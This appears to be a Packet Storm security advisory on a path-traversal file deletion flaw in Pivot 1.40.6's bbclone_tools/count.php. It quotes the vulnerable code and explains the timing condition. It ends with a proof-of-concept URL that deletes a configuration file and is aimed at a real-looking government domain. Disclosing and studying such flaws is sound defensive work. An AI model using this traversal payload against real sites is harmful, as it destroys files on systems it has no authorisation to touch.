Pivot version 1.40.6 suffers from a remote arbitrary file deletion vulnerability.
df943f28944b16037e3f1e0cd5482be10fad32c24cd4c5622cb3b237439e06b5Pivot 1.40.6 Remote File Delete
Alfons Luja
Vuln :
extensions/bbclone_tools/hr_conf.php line 20
...
$bbclone_debug = false; //is never change
...
=========================================================
extensions/bbclone_tools/count.php
...
if ( ($_GET["refkey"]!="") && file_exists("$refkeydir/".$_GET["refkey"])) { [1]
if ($bbclone_debug==true) { echo "Refkey found..<br />"; }
// Getting the time offset between the web and file server (if there is any)
$offset = timediffwebfile($bbclone_debug);
if ((time() - filectime("$refkeydir/".$_GET["refkey"])) < (1000+$offset)) { [2]
include("do_count.php");
if ($bbclone_debug!=true) {
header("content-type:image/gif");
readfile("pixel.gif");
} else {
echo "Counted normally";
}
die();
} else if ($bbclone_debug==true) {
echo "too old!";
}
if ($bbclone_debug!=true) { [3]
unlink("$refkeydir/".$_GET["refkey"]);
}
}
...
1] . We can put existent file
2] . Time dependences
If current time - last modification time < 1000 + $offset (usually 1001,1002 not more)
We must wait a moment other way 'exploit dosent work'
3] . $bbclone_debug is always false so if condition from point [2] == false
We can delete some file
If register globals is ON we can using this bug to include some file
poc :
http://www.pentagon.gov/~pivot_1406_full/extensions/bbclone_tools/count.php?refkey=../../../extensions/bbclone_tools/hr_conf.php
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed